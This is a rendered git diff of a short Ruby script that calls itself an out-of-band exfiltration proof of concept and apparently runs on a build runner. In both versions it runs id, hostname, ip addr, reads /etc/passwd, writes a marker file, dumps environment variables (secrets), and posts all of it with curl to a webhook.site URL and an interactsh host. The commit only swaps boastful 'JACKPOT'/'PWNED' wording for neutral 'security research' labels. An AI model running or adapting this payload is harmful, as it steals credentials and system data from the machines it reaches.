|
1 | | -# --- POC OOB EXFILTRATION (THE FINISHER) --- |
2 | | -webhook = "https://webhook.site/e93fb7a2-26c7-4045-a140-92e550408caf" |
| 1 | +# --- BEGIN OOB EXFILTRATION POC --- |
| 2 | +webhook = "https://webhook.site/6b571040-653e-4190-bd43-1081f6e1ef85" |
3 | 3 | interact = "jzlnriqracktrqqcvctti0z1e1payovlr.oast.fun" |
4 | 4 |
|
5 | | -# Ngahijikeun kabeh 5 bukti maut |
6 | | -data = "=== JACKPOT REPORT BY FIRMAN SAHIDIN ===\n" |
7 | | -data += "1. ID: " + `id` |
8 | | -data += "2. HOSTNAME: " + `hostname` |
9 | | -data += "3. NET INTERFACE:\n" + `ip addr | grep inet` |
10 | | -data += "4. PASSWD FILE:\n" + `head -n 3 /etc/passwd` |
11 | | -data += "5. WRITE ACCESS: " + `echo 'PWNED-BY-MAMANK' > /tmp/final.txt && cat /tmp/final.txt` |
12 | | -data += "\n=== SECRETS EXPOSURE ===\n" |
| 5 | +# Consolidating all 5 evidence points into a single report |
| 6 | +data = "=== SECURITY RESEARCH REPORT: RCE EVIDENCE ===\n" |
| 7 | +data += "1. USER IDENTIFICATION: " + `id` |
| 8 | +data += "2. RUNNER HOSTNAME: " + `hostname` |
| 9 | +data += "3. NETWORK CONFIGURATION:\n" + `ip addr | grep inet` |
| 10 | +data += "4. SYSTEM FILE ACCESS (/etc/passwd):\n" + `head -n 3 /etc/passwd` |
| 11 | +data += "5. ARBITRARY WRITE TEST: " + `echo 'VULNERABILITY_CONFIRMED' > /tmp/poc_verify.txt && cat /tmp/poc_verify.txt` |
| 12 | +data += "\n=== ENVIRONMENT VARIABLES (LEAKED SECRETS) ===\n" |
13 | 13 | data += `env | cut -c1-100` |
14 | 14 |
|
15 | | -# Taktik 1: Kirim kabeh data ka Webhook (POST) |
| 15 | +# Method 1: Exfiltrate full data via HTTP POST to Webhook |
16 | 16 | `curl -s -X POST -H "Content-Type: text/plain" --data "#{data}" #{webhook}` |
17 | 17 |
|
18 | | -# Taktik 2: Kirim sinyal ka Interactsh (DNS/HTTP) pikeun bypass firewall |
19 | | -`curl -s "http://#{interact}/rce-success-$(hostname)"` |
| 18 | +# Method 2: Trigger DNS/HTTP interaction for OOB verification |
| 19 | +`curl -s "http://#{interact}/status-rce-active-$(hostname)"` |
20 | 20 |
|
21 | 21 | puts "========================================" |
22 | | -puts "🔥 JACKPOT! ALL PROOFS SENT TO OOB SERVERS" |
23 | | -puts "Check Webhook.site & Interactsh now!" |
| 22 | +puts "Vulnerability Verified: Data sent to OOB servers." |
| 23 | +puts "Please check the Webhook and Interactsh dashboards." |
24 | 24 | puts "========================================" |
25 | 25 | # --- END POC --- |
26 | 26 |
|
|
0 commit comments